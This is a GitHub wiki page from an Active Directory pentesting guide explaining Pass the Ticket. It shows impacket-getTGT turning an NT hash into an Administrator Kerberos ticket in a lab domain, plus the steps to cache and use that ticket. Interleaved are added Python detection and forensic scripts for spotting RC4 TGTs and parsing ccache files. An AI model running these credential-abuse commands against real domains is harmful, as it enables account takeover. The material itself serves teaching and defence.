Pass the Ticket - maxbirnbacher/ADPentesting101 GitHub Wiki

Introduction

What: Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password.

Why: It may not be possible to authenticate with NTLM, and only Kerberos authentication is allowed.  I won’t even attempt to explain how Kerberos works (I don’t quite get it honestly) but it can be very useful to understand how to use it in attacks.

How: The normal way to create a Kerberos ticket on Linux is by using kinit with the username, domain, and password.  If you don’t have the password, this is a problem.  Fortunately, impacket has a tool that allows you to use an NT Hash to acquire a valid Ticket Granting Ticket (TGT) from a domain controller.  Unfortunately however, Linux distros don’t typically have Kerberos tools installed on them and you will need to set them up.

Prerequisites

  • Install the Kerberos client package (krb5-user on Debian-based distros)
  • Configure the AD realm in krb5.conf
  • Get DNS working properly (the domain controller must resolve by name)
  • Sync time with the domain controller (Kerberos rejects requests outside the allowed clock skew)
  • Add an /etc/hosts entry such as: 172.27.12.20 dc.tophack.local tophack.local

impacket-getTGT

Create a Kerberos TGT using an NT hash

impacket-getTGT tophack.local/Administrator -hashes aad3b435b51404eeaad3b435b51404ee:e52d9c51eade9526fb936c716ec3dde1
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Saving ticket in Administrator.ccache
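From the defender's side, a TGT obtained from an NT hash (as the -hashes option above does) has a recognisable footprint: the AS-REQ must use the RC4-HMAC enctype (0x17), because the NT hash is the RC4 key, and the domain controller records every TGT issuance as Event 4768 with a TicketEncryptionType field. The following is an added example, not code from the wiki or from impacket: it runs over constructed key=value renderings of 4768/4769 events (the DC address 172.27.12.20 is the page's; the other addresses and account names are made up) and flags accounts whose TGTs are normally AES but suddenly come back as RC4.

```python
"""Flag 4768 TGT requests that look like an NT-hash-based AS-REQ.

Added example (not from the original page or the ADPentesting101 wiki).
The sample lines are constructed flattenings of Windows Security event
fields; in practice they would come from a SIEM or wevtutil export.
"""
from collections import defaultdict

RC4_HMAC = 0x17            # TicketEncryptionType for RC4-HMAC (key == NT hash)
AES_TYPES = {0x11, 0x12}   # aes128 / aes256-cts-hmac-sha1-96

SAMPLE_EVENTS = [  # constructed sample data, not real logs
    "EventID=4768 TargetUserName=Administrator IpAddress=172.27.12.50 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=Administrator IpAddress=172.27.12.50 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=svc_legacy IpAddress=172.27.12.60 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=Administrator IpAddress=172.27.12.99 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4769 TargetUserName=Administrator IpAddress=172.27.12.99 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=bob IpAddress=172.27.12.70 TicketEncryptionType=0x17 Status=0x6",
]


def parse_event(line: str) -> dict:
    """Turn one 'Key=Value Key=Value' line into a dict; enctype becomes an int."""
    fields = dict(tok.split("=", 1) for tok in line.split())
    fields["TicketEncryptionType"] = int(fields.get("TicketEncryptionType", "0"), 16)
    return fields


def find_rc4_tgt_anomalies(lines) -> list:
    """Return (account, source IP) for successful RC4 TGTs issued to accounts
    that also hold AES-issued TGTs in the same window.

    Accounts that only ever get RC4 (svc_legacy above) are not flagged: that
    usually means a legacy encryption setting, not a hash-based request.
    Failed requests (Status != 0x0) and 4769 service-ticket events are ignored.
    """
    events = [parse_event(l) for l in lines]
    tgts = [e for e in events if e["EventID"] == "4768" and e["Status"] == "0x0"]

    baseline = defaultdict(set)          # account -> enctypes it has been issued
    for e in tgts:
        baseline[e["TargetUserName"]].add(e["TicketEncryptionType"])

    alerts = []
    for e in tgts:
        acct = e["TargetUserName"]
        if e["TicketEncryptionType"] == RC4_HMAC and baseline[acct] & AES_TYPES:
            alerts.append((acct, e["IpAddress"]))
    return alerts


if __name__ == "__main__":
    for acct, ip in find_rc4_tgt_anomalies(SAMPLE_EVENTS):
        print(f"RC4 TGT for AES-capable account {acct} requested from {ip}")
```

The baseline here is built from the same batch of events; in a real deployment it would come from a longer history per account, and the source IP should additionally be checked against the list of domain-joined hosts, since a Linux box running impacket will not be one of them.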

Copy the ticket to /tmp/krb5cc_0 (the default cache location for uid 0), as a lot of tools look for it there. Also set the KRB5CCNAME environment variable to the ticket location, as other tools use that to find the cache.

cp Administrator.ccache /tmp/krb5cc_0
export KRB5CCNAME=/tmp/krb5cc_0

Validate the ticket using klist (part of the krb5-user package).

klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: Administrator@TOPHACK.LOCAL

Valid starting     Expires            Service principal
04/23/24 11:10:18  04/23/24 21:10:18  krbtgt/TOPHACK.LOCAL@TOPHACK.LOCAL
        renew until 04/24/24 11:10:18
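When triaging a Linux host, the same cache file is a forensic artifact: a ccache under /tmp that holds a TGT for a privileged account, with a session key enctype that does not match the domain's normal settings, is exactly what this technique leaves behind. The reader below is an added example, not the page's or MIT Kerberos' own code; it parses the version 4 ccache layout (as documented in MIT's ccache_file_format) and reports, klist-style, the default principal, each credential's client and server principals, validity, and session-key enctype. build_sample_ccache() constructs a synthetic cache for the page's Administrator@TOPHACK.LOCAL TGT with the timestamps shown above so the script runs offline; its key and ticket bytes are placeholders.

```python
"""Minimal reader for MIT krb5 credential caches (ccache version 4).

Added example, not from the original wiki page.  Layout follows the MIT
ccache_file_format documentation: big-endian integers, counted byte strings
with a uint32 length prefix, principals as (name_type, n_components, realm,
components...).  The session key is read and discarded, never printed.
"""
import struct
import sys
from dataclasses import dataclass

ENCTYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}

# Timestamps from the klist output on the page: 2024-04-23 11:10:18 UTC,
# expires ten hours later, renewable for one day.
SAMPLE_START = 1713870618
SAMPLE_END = SAMPLE_START + 10 * 3600
SAMPLE_RENEW = SAMPLE_START + 24 * 3600


@dataclass
class Credential:
    client: str
    server: str
    enctype: int
    starttime: int
    endtime: int
    renew_till: int

    @property
    def is_tgt(self) -> bool:
        return self.server.startswith("krbtgt/")


class _Reader:
    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def take(self, n: int) -> bytes:
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated ccache")
        self.pos += n
        return chunk

    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack("!H", self.take(2))[0]
    def u32(self): return struct.unpack("!I", self.take(4))[0]
    def counted(self): return self.take(self.u32())   # uint32 length prefix

    def principal(self) -> str:
        self.u32()                                    # name type, not needed here
        ncomp = self.u32()
        realm = self.counted().decode()
        comps = [self.counted().decode() for _ in range(ncomp)]
        return "/".join(comps) + "@" + realm


def parse_ccache(data: bytes):
    """Return (default_principal, [Credential, ...]) from raw ccache bytes."""
    r = _Reader(data)
    if r.u16() != 0x0504:
        raise ValueError("only ccache version 4 is handled")
    r.take(r.u16())                       # header block (time-offset tags), skipped
    default_principal = r.principal()
    creds = []
    while r.pos < len(data):
        client, server = r.principal(), r.principal()
        enctype = r.u16()
        r.counted()                       # session key bytes, discarded
        _authtime, start, end, renew = r.u32(), r.u32(), r.u32(), r.u32()
        r.u8()                            # is_skey
        r.u32()                           # ticket flags
        for _ in range(r.u32()):          # addresses: uint16 type + counted data
            r.u16(); r.counted()
        for _ in range(r.u32()):          # authorization data: uint16 type + counted data
            r.u16(); r.counted()
        r.counted()                       # ticket (ASN.1 blob)
        r.counted()                       # second ticket
        creds.append(Credential(client, server, enctype, start, end, renew))
    return default_principal, creds


def triage(data: bytes, now: int) -> list:
    """klist-style summary lines, plus the session-key enctype per credential."""
    default_principal, creds = parse_ccache(data)
    lines = [f"default principal: {default_principal}"]
    for c in creds:
        state = "valid" if c.starttime <= now < c.endtime else "expired"
        kind = "TGT" if c.is_tgt else "service ticket"
        lines.append(f"{kind} {c.client} -> {c.server}: {state}, "
                     f"session key {ENCTYPE_NAMES.get(c.enctype, c.enctype)}")
    return lines


# --- constructed sample cache (placeholder key and ticket bytes) ---------------
def _counted(b: bytes) -> bytes:
    return struct.pack("!I", len(b)) + b


def _principal(realm: str, *comps: str) -> bytes:
    out = struct.pack("!II", 1, len(comps)) + _counted(realm.encode())   # name type 1 = NT_PRINCIPAL
    return out + b"".join(_counted(c.encode()) for c in comps)


def build_sample_ccache(start=SAMPLE_START, end=SAMPLE_END, renew=SAMPLE_RENEW, enctype=23) -> bytes:
    realm = "TOPHACK.LOCAL"
    cred = (_principal(realm, "Administrator") + _principal(realm, "krbtgt", realm)
            + struct.pack("!H", enctype) + _counted(b"\x00" * 16)      # placeholder session key
            + struct.pack("!IIII", start, start, end, renew)
            + b"\x00" + struct.pack("!I", 0x40E10000)                  # is_skey, ticket flags
            + struct.pack("!II", 0, 0)                                 # no addresses, no authdata
            + _counted(b"PLACEHOLDER-TICKET") + _counted(b""))
    return struct.pack("!HH", 0x0504, 0) + _principal(realm, "Administrator") + cred


if __name__ == "__main__":
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_ccache()
    print("\n".join(triage(raw, SAMPLE_START + 3600)))
```

Run it as `python3 ccache_triage.py /tmp/krb5cc_0` on a collected image to list the tickets without executing the host's own tools; an rc4-hmac session key on a TGT for an account that the domain issues AES keys to is the same indicator the DC-side 4768 check looks for.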

Now that you have a ticket you can use it with all of the impacket tools as an alternative to providing a password or NT hash (the -k -no-pass options). This will prove to be very useful in certain situations as you will see next. Do note that whenever using Kerberos authentication you will want to use DNS host names of targets instead of IP addresses, because the service ticket is requested for an SPN built from the host name and an IP address will not match it.

Source: https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/